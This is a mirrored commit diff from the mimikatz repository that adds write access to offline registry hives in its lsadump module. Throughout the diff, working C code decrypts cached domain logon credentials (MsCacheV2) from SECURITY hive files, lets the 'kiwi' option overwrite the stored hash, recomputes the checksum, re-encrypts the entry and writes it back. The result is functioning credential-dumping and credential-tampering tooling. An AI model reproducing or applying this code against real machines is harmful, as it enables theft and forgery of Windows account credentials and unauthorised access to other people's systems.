mirror of
https://github.com/gentilkiwi/mimikatz
synced 2025-02-09 21:56:53 +00:00
registry write access (limitations with low-level file access)
This commit is contained in:
Benjamin DELPY
parent
c7cf47f168
commit
e3914fec3a
@ -55,7 +55,7 @@ NTSTATUS kuhl_m_lsadump_sam(int argc, wchar_t * argv[])
|
||||
hData = CreateFile(argv[0], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
|
||||
if(hData != INVALID_HANDLE_VALUE)
|
||||
{
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_HIVE, hData, &hRegistry))
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_HIVE, hData, FALSE, &hRegistry))
|
||||
{
|
||||
isKeyOk = kuhl_m_lsadump_getComputerAndSyskey(hRegistry, NULL, sysKey);
|
||||
kull_m_registry_close(hRegistry);
|
||||
@ -68,7 +68,7 @@ NTSTATUS kuhl_m_lsadump_sam(int argc, wchar_t * argv[])
|
||||
hData = CreateFile(argv[1], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
|
||||
if(hData != INVALID_HANDLE_VALUE)
|
||||
{
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_HIVE, hData, &hRegistry))
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_HIVE, hData, FALSE, &hRegistry))
|
||||
{
|
||||
kuhl_m_lsadump_getUsersAndSamKey(hRegistry, NULL, sysKey);
|
||||
kull_m_registry_close(hRegistry);
|
||||
@ -79,7 +79,7 @@ NTSTATUS kuhl_m_lsadump_sam(int argc, wchar_t * argv[])
|
||||
}
|
||||
else
|
||||
{
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, &hRegistry))
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hRegistry))
|
||||
{
|
||||
if(kull_m_registry_RegOpenKeyEx(hRegistry, HKEY_LOCAL_MACHINE, L"SYSTEM", 0, KEY_READ, &hBase))
|
||||
{
|
||||
@ -120,23 +120,23 @@ NTSTATUS kuhl_m_lsadump_secretsOrCache(int argc, wchar_t * argv[], BOOL secretsO
|
||||
BOOL isKeyOk = FALSE;
|
||||
BOOL isKiwi = kull_m_string_args_byName(argc, argv, L"kiwi", NULL, NULL);
|
||||
|
||||
if(argc && !isKiwi)
|
||||
if(argc)
|
||||
{
|
||||
hDataSystem = CreateFile(argv[0], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
|
||||
if(hDataSystem != INVALID_HANDLE_VALUE)
|
||||
{
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_HIVE, hDataSystem, &hSystem))
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_HIVE, hDataSystem, FALSE, &hSystem))
|
||||
{
|
||||
if(kuhl_m_lsadump_getComputerAndSyskey(hSystem, NULL, sysKey))
|
||||
{
|
||||
if(argc > 1)
|
||||
{
|
||||
hDataSecurity = CreateFile(argv[1], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
|
||||
hDataSecurity = CreateFile(argv[1], GENERIC_READ | (isKiwi ? GENERIC_WRITE : 0), 0, NULL, OPEN_EXISTING, 0, NULL);
|
||||
if(hDataSecurity != INVALID_HANDLE_VALUE)
|
||||
{
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_HIVE, hDataSecurity, &hSecurity))
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_HIVE, hDataSecurity, isKiwi, &hSecurity))
|
||||
{
|
||||
kuhl_m_lsadump_getLsaKeyAndSecrets(hSecurity, NULL, hSystem, NULL, sysKey, secretsOrCache, FALSE);
|
||||
kuhl_m_lsadump_getLsaKeyAndSecrets(hSecurity, NULL, hSystem, NULL, sysKey, secretsOrCache, isKiwi);
|
||||
kull_m_registry_close(hSecurity);
|
||||
}
|
||||
CloseHandle(hDataSecurity);
|
||||
@ -150,7 +150,7 @@ NTSTATUS kuhl_m_lsadump_secretsOrCache(int argc, wchar_t * argv[], BOOL secretsO
|
||||
}
|
||||
else
|
||||
{
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, &hSystem))
|
||||
if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hSystem))
|
||||
{
|
||||
if(kull_m_registry_RegOpenKeyEx(hSystem, HKEY_LOCAL_MACHINE, L"SYSTEM", 0, KEY_READ, &hSystemBase))
|
||||
{
|
||||
@ -747,7 +747,7 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity,
|
||||
s1 = szSecret - FIELD_OFFSET(MSCACHE_ENTRY, enc_data);
|
||||
RtlCopyMemory(digest, pMsCacheEntry->iv, LAZY_IV_SIZE);
|
||||
nStatus = aesCTSDecryptMsg(AES_128_KEY_SIZE, pNLKM, s1, pMsCacheEntry->enc_data, digest);
|
||||
if(NT_SUCCESS(status))
|
||||
if(NT_SUCCESS(nStatus))
|
||||
{
|
||||
kuhl_m_lsadump_printMsCache(pMsCacheEntry, '2');
|
||||
if(kiwime)
|
||||
@ -758,18 +758,17 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity,
|
||||
if(NT_SUCCESS(kuhl_m_lsadump_get_dcc(((PMSCACHE_DATA) pMsCacheEntry->enc_data)->mshashdata, kiwiKey, &usr, j)))
|
||||
{
|
||||
kprintf(L" MsCacheV2 : "); kull_m_string_wprintf_hex(((PMSCACHE_DATA) pMsCacheEntry->enc_data)->mshashdata, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
|
||||
status = HMACwithSHA(pNLKM, AES_128_KEY_SIZE, pMsCacheEntry->enc_data, s1, (PVOID *) &pMsCacheEntry->cksum, MD5_DIGEST_LENGTH);
|
||||
if(NT_SUCCESS(status))
|
||||
nStatus = HMACwithSHA(pNLKM, AES_128_KEY_SIZE, pMsCacheEntry->enc_data, s1, (PVOID *) &pMsCacheEntry->cksum, MD5_DIGEST_LENGTH);
|
||||
if(NT_SUCCESS(nStatus))
|
||||
{
|
||||
kprintf(L" Checksum : "); kull_m_string_wprintf_hex(pMsCacheEntry->cksum, MD5_DIGEST_LENGTH, 0); kprintf(L"\n");
|
||||
RtlCopyMemory(digest, pMsCacheEntry->iv, LAZY_IV_SIZE);
|
||||
nStatus = aesCTSEncryptMsg(AES_128_KEY_SIZE, pNLKM, s1, pMsCacheEntry->enc_data, digest);
|
||||
if(NT_SUCCESS(status))
|
||||
if(NT_SUCCESS(nStatus))
|
||||
{
|
||||
nStatus = RegSetValueEx(hCache, secretName, 0, type, (LPBYTE) pMsCacheEntry, szSecret);
|
||||
if(nStatus == ERROR_SUCCESS)
|
||||
if(kull_m_registry_RegSetValueEx(hSecurity, hCache, secretName, 0, type, (LPBYTE) pMsCacheEntry, szSecret))
|
||||
kprintf(L"> OK!\n");
|
||||
else PRINT_ERROR(L"RegSetValueEx: 0x%08x\n", nStatus);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_registry_RegSetValueEx");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -20,7 +20,7 @@ const wchar_t * KULL_M_REGISTRY_TYPE_WSTRING[] = {
|
||||
L"QWORD",
|
||||
};
|
||||
|
||||
BOOL kull_m_registry_open(IN KULL_M_REGISTRY_TYPE Type, IN HANDLE hAny, OUT PKULL_M_REGISTRY_HANDLE *hRegistry)
|
||||
BOOL kull_m_registry_open(IN KULL_M_REGISTRY_TYPE Type, IN HANDLE hAny, BOOL isWrite, OUT PKULL_M_REGISTRY_HANDLE *hRegistry)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
PKULL_M_REGISTRY_HIVE_HEADER pFh;
|
||||
@ -39,10 +39,10 @@ BOOL kull_m_registry_open(IN KULL_M_REGISTRY_TYPE Type, IN HANDLE hAny, OUT PKUL
|
||||
(*hRegistry)->pHandleHive = (PKULL_M_REGISTRY_HIVE_HANDLE) LocalAlloc(LPTR, sizeof(KULL_M_REGISTRY_HIVE_HANDLE));
|
||||
if((*hRegistry)->pHandleHive)
|
||||
{
|
||||
(*hRegistry)->pHandleHive->hFileMapping = CreateFileMapping(hAny, NULL, PAGE_READONLY, 0, 0, NULL);
|
||||
(*hRegistry)->pHandleHive->hFileMapping = CreateFileMapping(hAny, NULL, isWrite ? PAGE_READWRITE : PAGE_READONLY, 0, 0, NULL);
|
||||
if((*hRegistry)->pHandleHive->hFileMapping)
|
||||
{
|
||||
(*hRegistry)->pHandleHive->pMapViewOfFile = MapViewOfFile((*hRegistry)->pHandleHive->hFileMapping, FILE_MAP_READ, 0, 0, 0);
|
||||
(*hRegistry)->pHandleHive->pMapViewOfFile = MapViewOfFile((*hRegistry)->pHandleHive->hFileMapping, isWrite ? FILE_MAP_WRITE : FILE_MAP_READ, 0, 0, 0);
|
||||
if(pFh = (PKULL_M_REGISTRY_HIVE_HEADER) (*hRegistry)->pHandleHive->pMapViewOfFile)
|
||||
{
|
||||
if((pFh->tag == 'fger') && (pFh->fileType == 0))
|
||||
@ -247,14 +247,56 @@ BOOL kull_m_registry_RegQueryInfoKey(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HK
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kull_m_registry_RegQueryValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName, IN LPDWORD lpReserved, OUT OPTIONAL LPDWORD lpType, OUT OPTIONAL LPBYTE lpData, IN OUT OPTIONAL LPDWORD lpcbData)
|
||||
PKULL_M_REGISTRY_HIVE_VALUE_KEY kull_m_registry_searchValueNameInList(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD dwErrCode, i, szData;
|
||||
PKULL_M_REGISTRY_HIVE_KEY_NAMED pKn;
|
||||
PKULL_M_REGISTRY_HIVE_VALUE_LIST pVl;
|
||||
PKULL_M_REGISTRY_HIVE_VALUE_KEY pVk, pFvk = NULL;
|
||||
DWORD i;
|
||||
wchar_t * buffer;
|
||||
|
||||
pKn = hKey ? (PKULL_M_REGISTRY_HIVE_KEY_NAMED) hKey : hRegistry->pHandleHive->pRootNamedKey;
|
||||
if(pKn->tag == 'kn')
|
||||
{
|
||||
if(pKn->nbValues && (pKn->offsetValues != -1))
|
||||
{
|
||||
pVl = (PKULL_M_REGISTRY_HIVE_VALUE_LIST) (hRegistry->pHandleHive->pStartOf + pKn->offsetValues);
|
||||
for(i = 0 ; i < pKn->nbValues && !pFvk; i++)
|
||||
{
|
||||
pVk = (PKULL_M_REGISTRY_HIVE_VALUE_KEY) (hRegistry->pHandleHive->pStartOf + pVl->offsetValue[i]);
|
||||
if(pVk->tag == 'kv')
|
||||
{
|
||||
if(lpValueName)
|
||||
{
|
||||
if(pVk->szValueName)
|
||||
{
|
||||
if(pVk->flags & KULL_M_REGISTRY_HIVE_VALUE_KEY_FLAG_ASCII_NAME)
|
||||
buffer = kull_m_string_qad_ansi_c_to_unicode((char *) pVk->valueName, pVk->szValueName);
|
||||
else if(buffer = (wchar_t *) LocalAlloc(LPTR, pVk->szValueName + sizeof(wchar_t)))
|
||||
RtlCopyMemory(buffer, pVk->valueName, pVk->szValueName);
|
||||
|
||||
if(buffer)
|
||||
{
|
||||
if(_wcsicmp(lpValueName, buffer) == 0)
|
||||
pFvk = pVk;
|
||||
LocalFree(buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
else if(!pVk->szValueName)
|
||||
pFvk = pVk;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
return pFvk;
|
||||
}
|
||||
|
||||
BOOL kull_m_registry_RegQueryValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName, IN LPDWORD lpReserved, OUT OPTIONAL LPDWORD lpType, OUT OPTIONAL LPBYTE lpData, IN OUT OPTIONAL LPDWORD lpcbData)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD dwErrCode, szData;
|
||||
PKULL_M_REGISTRY_HIVE_VALUE_KEY pFvk = NULL;
|
||||
PVOID dataLoc;
|
||||
|
||||
switch(hRegistry->type)
|
||||
@ -265,58 +307,24 @@ BOOL kull_m_registry_RegQueryValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HK
|
||||
SetLastError(dwErrCode);
|
||||
break;
|
||||
case KULL_M_REGISTRY_TYPE_HIVE:
|
||||
pKn = hKey ? (PKULL_M_REGISTRY_HIVE_KEY_NAMED) hKey : hRegistry->pHandleHive->pRootNamedKey;
|
||||
if(pKn->tag == 'kn')
|
||||
pFvk = kull_m_registry_searchValueNameInList(hRegistry, hKey, lpValueName);
|
||||
if(status = (pFvk != NULL))
|
||||
{
|
||||
if(pKn->nbValues && (pKn->offsetValues != -1))
|
||||
szData = pFvk->szData & ~0x80000000;
|
||||
if(lpType)
|
||||
*lpType = pFvk->typeData;
|
||||
|
||||
if(lpcbData)
|
||||
{
|
||||
pVl = (PKULL_M_REGISTRY_HIVE_VALUE_LIST) (hRegistry->pHandleHive->pStartOf + pKn->offsetValues);
|
||||
for(i = 0 ; i < pKn->nbValues && !pFvk; i++)
|
||||
if(lpData)
|
||||
{
|
||||
pVk = (PKULL_M_REGISTRY_HIVE_VALUE_KEY) (hRegistry->pHandleHive->pStartOf + pVl->offsetValue[i]);
|
||||
if(pVk->tag == 'kv')
|
||||
if(status = (*lpcbData >= szData))
|
||||
{
|
||||
if(lpValueName)
|
||||
{
|
||||
if(pVk->szValueName)
|
||||
{
|
||||
if(pVk->flags & KULL_M_REGISTRY_HIVE_VALUE_KEY_FLAG_ASCII_NAME)
|
||||
buffer = kull_m_string_qad_ansi_c_to_unicode((char *) pVk->valueName, pVk->szValueName);
|
||||
else if(buffer = (wchar_t *) LocalAlloc(LPTR, pVk->szValueName + sizeof(wchar_t)))
|
||||
RtlCopyMemory(buffer, pVk->valueName, pVk->szValueName);
|
||||
|
||||
if(buffer)
|
||||
{
|
||||
if(_wcsicmp(lpValueName, buffer) == 0)
|
||||
pFvk = pVk;
|
||||
LocalFree(buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
else if(!pVk->szValueName)
|
||||
pFvk = pVk;
|
||||
|
||||
if(status = (pFvk != NULL))
|
||||
{
|
||||
szData = pFvk->szData & ~0x80000000;
|
||||
if(lpType)
|
||||
*lpType = pFvk->typeData;
|
||||
|
||||
if(lpcbData)
|
||||
{
|
||||
if(lpData)
|
||||
{
|
||||
if(status = (*lpcbData >= szData))
|
||||
{
|
||||
dataLoc = (pFvk->szData & 0x80000000) ? &pFvk->offsetData : (PVOID) &(((PKULL_M_REGISTRY_HIVE_BIN_CELL) (hRegistry->pHandleHive->pStartOf + pFvk->offsetData))->data);
|
||||
RtlCopyMemory(lpData, dataLoc , szData);
|
||||
}
|
||||
}
|
||||
*lpcbData = szData;
|
||||
}
|
||||
}
|
||||
dataLoc = (pFvk->szData & 0x80000000) ? &pFvk->offsetData : (PVOID) &(((PKULL_M_REGISTRY_HIVE_BIN_CELL) (hRegistry->pHandleHive->pStartOf + pFvk->offsetData))->data);
|
||||
RtlCopyMemory(lpData, dataLoc, szData);
|
||||
}
|
||||
}
|
||||
*lpcbData = szData;
|
||||
}
|
||||
}
|
||||
break;
|
||||
@ -326,6 +334,42 @@ BOOL kull_m_registry_RegQueryValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HK
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kull_m_registry_RegSetValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName, IN DWORD Reserved, IN DWORD dwType, IN OPTIONAL LPCBYTE lpData, IN DWORD cbData)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD szData, flags, dwErrCode;
|
||||
PKULL_M_REGISTRY_HIVE_VALUE_KEY pFvk;
|
||||
PVOID dataLoc;
|
||||
|
||||
switch(hRegistry->type)
|
||||
{
|
||||
case KULL_M_REGISTRY_TYPE_OWN:
|
||||
dwErrCode = RegSetValueEx(hKey, lpValueName, Reserved, dwType, lpData, cbData);
|
||||
if(!(status = (dwErrCode == ERROR_SUCCESS)))
|
||||
SetLastError(dwErrCode);
|
||||
break;
|
||||
case KULL_M_REGISTRY_TYPE_HIVE:
|
||||
if(pFvk = kull_m_registry_searchValueNameInList(hRegistry, hKey, lpValueName))
|
||||
{
|
||||
flags = pFvk->szData & 0x80000000;
|
||||
szData = pFvk->szData & ~0x80000000;
|
||||
if(status = (szData >= cbData))
|
||||
{
|
||||
pFvk->typeData = dwType;
|
||||
pFvk->szData = flags | cbData;
|
||||
dataLoc = (pFvk->szData & 0x80000000) ? &pFvk->offsetData : (PVOID) &(((PKULL_M_REGISTRY_HIVE_BIN_CELL) (hRegistry->pHandleHive->pStartOf + pFvk->offsetData))->data);
|
||||
RtlCopyMemory(dataLoc, lpData, szData);
|
||||
}
|
||||
else SetLastError(ERROR_NOT_SUPPORTED);
|
||||
}
|
||||
break;
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kull_m_registry_RegEnumKeyEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN DWORD dwIndex, OUT LPWSTR lpName, IN OUT LPDWORD lpcName, IN LPDWORD lpReserved, OUT OPTIONAL LPWSTR lpClass, IN OUT OPTIONAL LPDWORD lpcClass, OUT OPTIONAL PFILETIME lpftLastWriteTime)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
@ -30,15 +30,17 @@ typedef struct _KULL_M_REGISTRY_HANDLE {
|
||||
};
|
||||
} KULL_M_REGISTRY_HANDLE, *PKULL_M_REGISTRY_HANDLE;
|
||||
|
||||
BOOL kull_m_registry_open(IN KULL_M_REGISTRY_TYPE Type, IN HANDLE hAny, OUT PKULL_M_REGISTRY_HANDLE *hRegistry);
|
||||
BOOL kull_m_registry_open(IN KULL_M_REGISTRY_TYPE Type, IN HANDLE hAny, BOOL isWrite, OUT PKULL_M_REGISTRY_HANDLE *hRegistry);
|
||||
PKULL_M_REGISTRY_HANDLE kull_m_registry_close(IN PKULL_M_REGISTRY_HANDLE hRegistry);
|
||||
|
||||
BOOL kull_m_registry_RegOpenKeyEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpSubKey, IN DWORD ulOptions, IN REGSAM samDesired, OUT PHKEY phkResult);
|
||||
BOOL kull_m_registry_RegCloseKey(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey);
|
||||
BOOL kull_m_registry_RegQueryValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName, IN LPDWORD lpReserved, OUT OPTIONAL LPDWORD lpType, OUT OPTIONAL LPBYTE lpData, IN OUT OPTIONAL LPDWORD lpcbData);
|
||||
BOOL kull_m_registry_RegSetValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName, IN DWORD Reserved, IN DWORD dwType, IN OPTIONAL LPCBYTE lpData, IN DWORD cbData);
|
||||
BOOL kull_m_registry_RegQueryInfoKey(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, OUT OPTIONAL LPWSTR lpClass, IN OUT OPTIONAL LPDWORD lpcClass, IN OPTIONAL LPDWORD lpReserved, OUT OPTIONAL LPDWORD lpcSubKeys, OUT OPTIONAL LPDWORD lpcMaxSubKeyLen, OUT OPTIONAL LPDWORD lpcMaxClassLen, OUT OPTIONAL LPDWORD lpcValues, OUT OPTIONAL LPDWORD lpcMaxValueNameLen, OUT OPTIONAL LPDWORD lpcMaxValueLen, OUT OPTIONAL LPDWORD lpcbSecurityDescriptor, OUT OPTIONAL PFILETIME lpftLastWriteTime);
|
||||
|
||||
BOOL kull_m_registry_RegEnumKeyEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN DWORD dwIndex, OUT LPWSTR lpName, IN OUT LPDWORD lpcName, IN LPDWORD lpReserved, OUT OPTIONAL LPWSTR lpClass, IN OUT OPTIONAL LPDWORD lpcClass, OUT OPTIONAL PFILETIME lpftLastWriteTime);
|
||||
BOOL kull_m_registry_RegEnumValue(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN DWORD dwIndex, OUT LPWSTR lpValueName, IN OUT LPDWORD lpcchValueName, IN LPDWORD lpReserved, OUT OPTIONAL LPDWORD lpType, OUT OPTIONAL LPBYTE lpData, OUT OPTIONAL LPDWORD lpcbData);
|
||||
|
||||
PKULL_M_REGISTRY_HIVE_KEY_NAMED kull_m_registry_searchKeyNamedInList(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN PKULL_M_REGISTRY_HIVE_BIN_CELL pHbC, IN LPCWSTR lpSubKey);
|
||||
PKULL_M_REGISTRY_HIVE_KEY_NAMED kull_m_registry_searchKeyNamedInList(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN PKULL_M_REGISTRY_HIVE_BIN_CELL pHbC, IN LPCWSTR lpSubKey);
|
||||
PKULL_M_REGISTRY_HIVE_VALUE_KEY kull_m_registry_searchValueNameInList(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName);
|
||||
Loading…
Reference in New Issue
Block a user